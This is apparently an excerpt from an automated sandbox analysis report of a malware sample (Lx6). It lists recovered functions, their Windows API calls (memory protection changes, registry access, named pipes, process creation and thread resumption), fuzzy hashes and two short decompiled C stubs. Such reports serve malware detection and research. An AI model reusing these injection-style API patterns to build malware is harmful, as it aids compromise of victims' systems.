Associated: 00000000.00000002.496077898.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496085963.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Lx6.jbxd

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 85e2c52f1fc77180bcbf8ce2f5afd7a5793f7354440646c120c68488a931e967
Instruction ID: 8c21a8a4f30626b09a2be91b35b0c6eea432738b3c0a3aaf166ace6cc2105d99
Opcode Fuzzy Hash: 85e2c52f1fc77180bcbf8ce2f5afd7a5793f7354440646c120c68488a931e967
Instruction Fuzzy Hash: A9219171800209DFDB04CF85C981ABAF7F8FF48345F41446AD502E75A9E3B8AA64CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00753213 Relevance: 4.5, APIs: 3, Instructions: 49memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32 ref: 00753245
VirtualProtect.KERNEL32(?,00000004,00000040,80000000), ref: 0075325F
VirtualProtect.KERNEL32(?,00000004,80000000,80000000,?,00000004,00000040,80000000), ref: 00753292

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$lstrlen
String ID:
API String ID: 386137988-0
Opcode ID: 304c6eb387a150fad36777d3f1de7e70664d19d324c999295cfea7bdb8cdaf28
Instruction ID: 92da68964d293480c2b994bdbdea29013c31a4dd9502513e36c59f96b12881a0
Opcode Fuzzy Hash: 304c6eb387a150fad36777d3f1de7e70664d19d324c999295cfea7bdb8cdaf28
Instruction Fuzzy Hash: 7D111C75900608EFEB11CF95C885BDEBBB8EF14795F108059ED049A221C7B8DB84DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0076F514 Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,03F0B7F0,03F0C314), ref: 0076F529
RegOpenKeyA.ADVAPI32(80000001,03F0B7F0,03F0C314), ref: 0076F533
lstrlen.KERNEL32(03F0B7F0,00000000,00000000,0077706E,?,?,?,007632F0,00000001,00000000,03F0C314), ref: 0076F552

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CreateOpenlstrlen
String ID:
API String ID: 2865187142-0
Opcode ID: 861fbb5c73f972a7654778a6858c85f103831da470c9cf06c8d9ffc44b969a1a
Instruction ID: b3bbc87ca0779fb08ade5a5c1f33778fa2bdb41e0e0f4f6283e84fc5502cd119
Opcode Fuzzy Hash: 861fbb5c73f972a7654778a6858c85f103831da470c9cf06c8d9ffc44b969a1a
Instruction Fuzzy Hash: 92F0F6B2100208FFEB109F94EC89FEA7BBCEB41794F108115FD0795110E274DA80C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00757FAB Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(0000053C,00761CFE), ref: 00757FB5

Part of subcall function 0075D221: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,00757FC0), ref: 0075D24A
Part of subcall function 0075D221: RtlDeleteCriticalSection.NTDLL(00778400), ref: 0075D27D
Part of subcall function 0075D221: RtlDeleteCriticalSection.NTDLL(00778420), ref: 0075D284
Part of subcall function 0075D221: ReleaseMutex.KERNEL32(0000052C,00000000,?,?,?,00757FC0), ref: 0075D2AC
Part of subcall function 0075D221: CloseHandle.KERNEL32(?,?,00757FC0), ref: 0075D2B8
Part of subcall function 0075D221: ResetEvent.KERNEL32(00000000,00000000,?,?,?,00757FC0), ref: 0075D2C4
Part of subcall function 0075D221: CloseHandle.KERNEL32(?,?,00757FC0), ref: 0075D2D0
Part of subcall function 0075D221: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,00757FC0), ref: 0075D2D6
Part of subcall function 0075D221: SleepEx.KERNEL32(00000064,00000001,?,?,00757FC0), ref: 0075D2EA
Part of subcall function 0075D221: HeapFree.KERNEL32(00000000,00000000,?,?,00757FC0), ref: 0075D30D
Part of subcall function 0075D221: RtlRemoveVectoredExceptionHandler.NTDLL(00498540), ref: 0075D347
Part of subcall function 0075D221: SleepEx.KERNEL32(00000064,00000001,?,?,00757FC0), ref: 0075D356

CloseHandle.KERNEL32(0000053C), ref: 00757FCA
HeapDestroy.KERNELBASE(03B10000), ref: 00757FDA

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Sleep$CloseHandle$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
String ID:
API String ID: 2773679374-0
Opcode ID: 71d9aa4b827f7ebc73329ecff3bee1ca527e5e37936010152efdc585d276dc97
Instruction ID: e75ed94012e2f4c2cbf8ddc0da8ffce28192ce303de16a8a9d50f23cd46010c7
Opcode Fuzzy Hash: 71d9aa4b827f7ebc73329ecff3bee1ca527e5e37936010152efdc585d276dc97
Instruction Fuzzy Hash: 95E0EC703042009B9B509B75FC8CE5637986A003C23484418BC08D2064DE7CD8C9E629

Uniqueness

Uniqueness Score: -1.00%

Function 0076EB26 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000001,76B324D0,74714D40,00000000,0075AE06,?,00000000,?,?,0075DA8B,?,?,?), ref: 0076EB3B

Strings

4tw, xrefs: 0076EB68

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: HandleModule
String ID: 4tw
API String ID: 4139908857-1494338611
Opcode ID: f1a9c150fcd284cb686e45a67d01a86cf67d5339282178d31e06bcb8c7be06cf
Instruction ID: ea587a88037c5f833dd0ed523424bcc5804297ba87e872cbcc233b22efff6a0a
Opcode Fuzzy Hash: f1a9c150fcd284cb686e45a67d01a86cf67d5339282178d31e06bcb8c7be06cf
Instruction Fuzzy Hash: CE3174B6A00108EFCF10DF98C889D9DB7B4FB44360F5484A9E60BAB211D778AD41CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0040186D Relevance: 3.1, APIs: 2, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040186D() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t35;
				intOrPtr _t38;

				_t15 =  *0x404184;
				if( *0x40416c > 5) {
					_t16 = _t15 + 0x4050f9;
				} else {
					_t16 = _t15 + 0x4050b1;
				}
				E00401DE5(_t16, _t16);
				_t35 = 6;
				memset( &_v32, 0, _t35 << 2);
				if(E00401E20( &_v32,  &_v16,  *0x404180 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x404178);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E00401927(_t38, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x404178 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							L00401FED(_t32 + 4);
						}
					}
					_t25 = E00401F49(_v28); // executed
				}
				ExitThread(_t25);
			}

0x00401873
0x00401884
0x0040188e
0x00401886
0x00401886
0x00401886
0x00401895
0x0040189e
0x004018a3
0x004018c1
0x0040191e
0x004018c3
0x004018c9
0x004018cf
0x004018dd
0x004018e1
0x004018e8
0x004018f0
0x004018f4
0x004018fc
0x0040190d
0x004018fe
0x00401904
0x00401904
0x004018fc
0x00401915
0x00401915
0x00401920

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 004018C9
ExitThread.KERNEL32 ref: 00401920

Memory Dump Source

Source File: 00000000.00000002.496058515.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.496020700.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496068804.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496077898.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496085963.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Lx6.jbxd

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: 718d281ae2ea69d26147d5d17f1ce955b492b683c592638d0f3376a394eae9f0
Instruction ID: 571c5a9b35d8d4e20985f4fecaacc254bb060f659e53b59eaf4d0e2f3b93dc61
Opcode Fuzzy Hash: 718d281ae2ea69d26147d5d17f1ce955b492b683c592638d0f3376a394eae9f0
Instruction Fuzzy Hash: C411E2B2504205ABE701EB65DD48D9B77ECAB98304F01483BF605F71B1EB34E649CB49

Uniqueness

Uniqueness Score: -1.00%

Function 007532E5 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

EnumProcessModules.PSAPI(?,00000000,00001000,00000000,00001000), ref: 0075331D
GetLastError.KERNEL32(?,00000000,00001000,00000000,00001000), ref: 00753364

Part of subcall function 0077020F: HeapFree.KERNEL32(00000000,0076C525,00752B34,00000000,?,775EC740,0076C525), ref: 0077021B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
String ID:
API String ID: 552344955-0
Opcode ID: a3d13231965490c1b0d0d1b108c337507bbe9bd3f916349e95a1b5d82dd1f7a7
Instruction ID: 021444fb64a4c4d46954146baa533aed2a3490dd6400c9f155733dd01af492e7
Opcode Fuzzy Hash: a3d13231965490c1b0d0d1b108c337507bbe9bd3f916349e95a1b5d82dd1f7a7
Instruction Fuzzy Hash: E911777190020DEBDB11DB98CC88BEEBBB9FF51792F204059E81597250DBB89F05C794

Uniqueness

Uniqueness Score: -1.00%

Function 00766AB6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0075DCFB: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,00000001,00000000,00000000,?,74715520,00000000,?,?,?,0075508A,?), ref: 0075DD33
Part of subcall function 0075DCFB: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0075DD47
Part of subcall function 0075DCFB: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00000001,?,?,?,0075508A,?,?,?,?,?,00000001), ref: 0075DD61
Part of subcall function 0075DCFB: RegCloseKey.KERNEL32(?,?,?,?,0075508A,?,?,?,?,?,00000001), ref: 0075DD8B

HeapFree.KERNEL32(00000000,00000000,00000000,00778194,?,00000000,?,?,?,00000000,0075AFD6,00761CA7,00000000,00000000,?,00000000), ref: 00766B27

Part of subcall function 0076BBD0: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,00751058,00000000), ref: 0076BBE2
Part of subcall function 0076BBD0: StrChrA.SHLWAPI(?,00000020,?,?,00000000,00751058,00000000), ref: 0076BBF1

Part of subcall function 0076FD17: CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,7476F5B0,0075AE6D,?,00000000,?,?,0075DA8B,?), ref: 0076FD3D
Part of subcall function 0076FD17: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0076FD49
Part of subcall function 0076FD17: GetModuleHandleA.KERNEL32(?,03F09713,?,00000000,00000000), ref: 0076FD69
Part of subcall function 0076FD17: GetProcAddress.KERNEL32(00000000), ref: 0076FD70
Part of subcall function 0076FD17: Thread32First.KERNEL32(00000000,0000001C), ref: 0076FD80
Part of subcall function 0076FD17: CloseHandle.KERNEL32(00000000), ref: 0076FDC8

Strings

W"w, xrefs: 00766AE9

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
String ID: W"w
API String ID: 2627809124-4284564376
Opcode ID: eab5761fc7b23c10ee74f816e7a0f588b0a1f0bca87ff350b08671201c8c2645
Instruction ID: 02d91eae9095d986689b5aa9cee8d01040748257fedee9c50244278f11d8ad51
Opcode Fuzzy Hash: eab5761fc7b23c10ee74f816e7a0f588b0a1f0bca87ff350b08671201c8c2645
Instruction Fuzzy Hash: AF018FB1600208FF9B15DBA8EC99CAFBBEDEB493847504059F80AD3121DA79AE45C734

Uniqueness

Uniqueness Score: -1.00%

Function 0075C6E2 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0075DCFB: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,00000001,00000000,00000000,?,74715520,00000000,?,?,?,0075508A,?), ref: 0075DD33
Part of subcall function 0075DCFB: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0075DD47
Part of subcall function 0075DCFB: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00000001,?,?,?,0075508A,?,?,?,?,?,00000001), ref: 0075DD61
Part of subcall function 0075DCFB: RegCloseKey.KERNEL32(?,?,?,?,0075508A,?,?,?,?,?,00000001), ref: 0075DD8B

HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0075C758

Part of subcall function 0076BBD0: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,00751058,00000000), ref: 0076BBE2
Part of subcall function 0076BBD0: StrChrA.SHLWAPI(?,00000020,?,?,00000000,00751058,00000000), ref: 0076BBF1

Part of subcall function 00760EDC: lstrlen.KERNEL32(00753A9F,00000000,?,?,?,?,00753A9F,00000035,00000000,?,00000000), ref: 00760F0C
Part of subcall function 00760EDC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00760F22
Part of subcall function 00760EDC: memcpy.NTDLL(00000010,00753A9F,00000000,?,?,00753A9F,00000035,00000000), ref: 00760F58
Part of subcall function 00760EDC: memcpy.NTDLL(00000010,00000000,00000035,?,?,00753A9F,00000035), ref: 00760F73
Part of subcall function 00760EDC: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 00760F91
Part of subcall function 00760EDC: GetLastError.KERNEL32(?,?,00753A9F,00000035), ref: 00760F9B
Part of subcall function 00760EDC: HeapFree.KERNEL32(00000000,00000000,?,?,00753A9F,00000035), ref: 00760FBE

Strings

W"w, xrefs: 0075C712

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
String ID: W"w
API String ID: 730886825-4284564376
Opcode ID: 96ba41d0a75d9d407ece193af56e4231f5ec8f8c9f0bd07e5a5788be81801b45
Instruction ID: 432a783dd36a93b759b2159cf91e4259ff93e3c4971a5694c337d3230d72a5bc
Opcode Fuzzy Hash: 96ba41d0a75d9d407ece193af56e4231f5ec8f8c9f0bd07e5a5788be81801b45
Instruction Fuzzy Hash: 1E01B131600208FFDB21D758DC4DFDF7BACEB09780F004455B905A7190DBB8AA45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0075C266 Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00778420), ref: 0075C270
RtlLeaveCriticalSection.NTDLL(00778420), ref: 0075C2AC

Part of subcall function 007568E1: lstrlen.KERNEL32(?,?,00000000), ref: 0075692F
Part of subcall function 007568E1: VirtualProtect.KERNEL32(00000000,00000000,00000040,-00000020,?,00000000), ref: 00756941
Part of subcall function 007568E1: lstrcpy.KERNEL32(00000000,?), ref: 00756950
Part of subcall function 007568E1: VirtualProtect.KERNEL32(00000000,00000000,?,-00000020,?,00000000), ref: 00756961

Part of subcall function 0077020F: HeapFree.KERNEL32(00000000,0076C525,00752B34,00000000,?,775EC740,0076C525), ref: 0077021B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
String ID:
API String ID: 1872894792-0
Opcode ID: d14b950c5ee8143d6004fa1ad7448cde5b5d3e517947caa44a0256df2ea8a0c9
Instruction ID: dc1f98e8acd08acdcfd7c9581a295b991c05cc53eab777fabd160cd57a1a9a23
Opcode Fuzzy Hash: d14b950c5ee8143d6004fa1ad7448cde5b5d3e517947caa44a0256df2ea8a0c9
Instruction Fuzzy Hash: A0F05C76A412168FCB602F18DC8C875FBA8FB44391315816AEC0943300CEFD5C00C6D1

Uniqueness

Uniqueness Score: -1.00%

Function 0075417A Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(0077807C), ref: 0075418F

Part of subcall function 0076D196: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0076D1C1
Part of subcall function 0076D196: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 0076D1CE
Part of subcall function 0076D196: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 0076D25A
Part of subcall function 0076D196: GetModuleHandleA.KERNEL32(00000000), ref: 0076D265
Part of subcall function 0076D196: RtlImageNtHeader.NTDLL(00000000), ref: 0076D26E
Part of subcall function 0076D196: RtlExitUserThread.NTDLL(00000000), ref: 0076D283

InterlockedDecrement.KERNEL32(0077807C), ref: 007541B3

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
String ID:
API String ID: 1011034841-0
Opcode ID: e5348455742659901a43bdef9fd903b4ef81e7380ad619e51e3d82aa0984c2ac
Instruction ID: 407822b437a9f7da80e54abd8da45113fdb1ae3373457aded6d9d74c728f5978
Opcode Fuzzy Hash: e5348455742659901a43bdef9fd903b4ef81e7380ad619e51e3d82aa0984c2ac
Instruction Fuzzy Hash: 19E0D831B84A29E78B395B709C0CAFA6653AB74796F00C614FE89C6050CB9CCCC8C6D1

Uniqueness

Uniqueness Score: -1.00%

Function 00758687 Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007548BA: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 007548F3
Part of subcall function 007548BA: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 00754929
Part of subcall function 007548BA: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00754935
Part of subcall function 007548BA: lstrcmpi.KERNEL32(?,00000000), ref: 00754972
Part of subcall function 007548BA: StrChrA.SHLWAPI(?,0000002E), ref: 0075497B
Part of subcall function 007548BA: lstrcmpi.KERNEL32(?,00000000), ref: 0075498D
Part of subcall function 007548BA: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 007549DE

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,007740F0,0000002C,0076A36A,03F08DF2,?,00000000,0076FB31), ref: 007586C6

Part of subcall function 00751402: GetProcAddress.KERNEL32(?), ref: 0075142B
Part of subcall function 00751402: NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,?), ref: 0075144D

VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,007740F0,0000002C,0076A36A,03F08DF2,?,00000000,0076FB31,?,00000318), ref: 00758751

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
String ID:
API String ID: 4138075514-0
Opcode ID: c9782e22d336d093769e1401a6961c2b045a6df89302b8e16dfe04a6f48f5d4a
Instruction ID: 43004141426160f86a7f27ea1b39d84b10575938caae9788556b3a8bd30ba039
Opcode Fuzzy Hash: c9782e22d336d093769e1401a6961c2b045a6df89302b8e16dfe04a6f48f5d4a
Instruction Fuzzy Hash: 4F212471D01228EBCF519FA5DC84ADEBBB0FF08720F24802AF918B6250C7784A45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0076CCCC Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,007779E8,-0000000C,?,?,?,0075EDB1,00000006,?,74715520,?,00755124,?), ref: 0076CD07

Part of subcall function 00768E68: NtQueryInformationProcess.NTDLL(00000000,00755124,00000018,00000000,00778420), ref: 00768E7F

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: HandleInformationModuleProcessQuery
String ID:
API String ID: 2776635927-0
Opcode ID: 036137efa609d5cb81cf41293811bf67d558167f849de87f8a742c013c60f27b
Instruction ID: ddd4b7fc47c2e997f75b985eb080b633f44b238f0f63295c4abe4aa9a43dfb7b
Opcode Fuzzy Hash: 036137efa609d5cb81cf41293811bf67d558167f849de87f8a742c013c60f27b
Instruction Fuzzy Hash: 81218131700648AFDB32CF5AC980D7A7BA9EF45790B154439ED869B150D779ED00DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00764282 Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007642D4

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 33e3c7fed2a47f1608d21354236c9ee083bb1119baf11cff9275e1350220b8ba
Instruction ID: 385777f94afbad7ec3f304a3cdabf71e4f17d6f17cc027fdbf3d113c18255344
Opcode Fuzzy Hash: 33e3c7fed2a47f1608d21354236c9ee083bb1119baf11cff9275e1350220b8ba
Instruction Fuzzy Hash: 41111B3220020AAFDF419F99DC449DA7FA9FF083A4B058125FE2D96121CB39DC21DB90

Uniqueness

Uniqueness Score: -1.00%

Function 007633D7 Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0076D45A: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,00778190,00000000,007633DE,?,00754074,?), ref: 0076D479
Part of subcall function 0076D45A: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,00778190,00000000,007633DE,?,00754074,?), ref: 0076D484
Part of subcall function 0076D45A: _wcsupr.NTDLL ref: 0076D491
Part of subcall function 0076D45A: lstrlenW.KERNEL32(00000000), ref: 0076D499

ResumeThread.KERNEL32(00000004,?,00754074,?), ref: 007633EC

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
String ID:
API String ID: 3646851950-0
Opcode ID: 9dd2bdabbdb6895f5d6d6713a1c2e035eb9b5b195a51ac681c8522cb66858f8b
Instruction ID: f5508a27249798bfaedfd0f32f9e5f12a41bcc7062ac11c631459d45aa732d5d
Opcode Fuzzy Hash: 9dd2bdabbdb6895f5d6d6713a1c2e035eb9b5b195a51ac681c8522cb66858f8b
Instruction Fuzzy Hash: 00D05E30B48740EADA321B11CD0AB2ABEA1AF50B80F00C418FD8B540A1DB3E9D50E515

Uniqueness

Uniqueness Score: -1.00%

Function 00771D7E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00771D70

Part of subcall function 00771EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,000240EC,00750000), ref: 00771F3C

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 3af9e5b005e6089c90835ccfa3a96100a8872dcf032efa5cf218bfff5dbc1800
Instruction ID: 06f51ca7a38192cd1135fbf7074c854216f68818d8870e98bb47546876781c8b
Opcode Fuzzy Hash: 3af9e5b005e6089c90835ccfa3a96100a8872dcf032efa5cf218bfff5dbc1800
Instruction Fuzzy Hash: 7FA002D5259605FC391865555D1BC37025CC4D5BD53B0C559F41984051658819459571

Uniqueness

Uniqueness Score: -1.00%

Function 00771D63 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00771D70

Part of subcall function 00771EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,000240EC,00750000), ref: 00771F3C

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: ec3b3f7980ec0da166397ebcfa135d1f1316c2354357b9422bb52de76c71cf6d
Instruction ID: 7e1da4f6dd791be383940bd3b49339a24abd951c4ec3cf7b16d61dd525c3f88b
Opcode Fuzzy Hash: ec3b3f7980ec0da166397ebcfa135d1f1316c2354357b9422bb52de76c71cf6d
Instruction Fuzzy Hash: BCA001E62A9705BC3A2866996D1BC3B025CC8E1BE63B0C55AF81994092AA8819859A71

Uniqueness

Uniqueness Score: -1.00%

Function 00401DE5 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00401DE5(void* __eax, intOrPtr _a4) {

				 *0x404190 =  *0x404190 & 0x00000000;
				_push(0);
				_push(0x40418c);
				_push(1);
				_push(_a4);
				 *0x404188 = 0xc; // executed
				L00401AD2(); // executed
				return __eax;
			}

0x00401de5
0x00401dec
0x00401dee
0x00401df3
0x00401df5
0x00401df9
0x00401e03
0x00401e08

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(0040189A,00000001,0040418C,00000000), ref: 00401E03

Memory Dump Source

Source File: 00000000.00000002.496058515.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.496020700.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496068804.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496077898.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496085963.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Lx6.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 235d83bc41b2eda3326966a9cd7613f133d18d8acb69cceed80d992d761ff3a1
Instruction ID: ada55773402aa08600b9d6492f12e92c36e19118579d0d27a74d4933b2a7c290
Opcode Fuzzy Hash: 235d83bc41b2eda3326966a9cd7613f133d18d8acb69cceed80d992d761ff3a1
Instruction Fuzzy Hash: A7C04CF4240300B6E621AB419D4AF057A55B7A4715F60052EF705391E1D3F91094992D

Uniqueness

Uniqueness Score: -1.00%

Function 0075E83D Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

Memory Dump Source

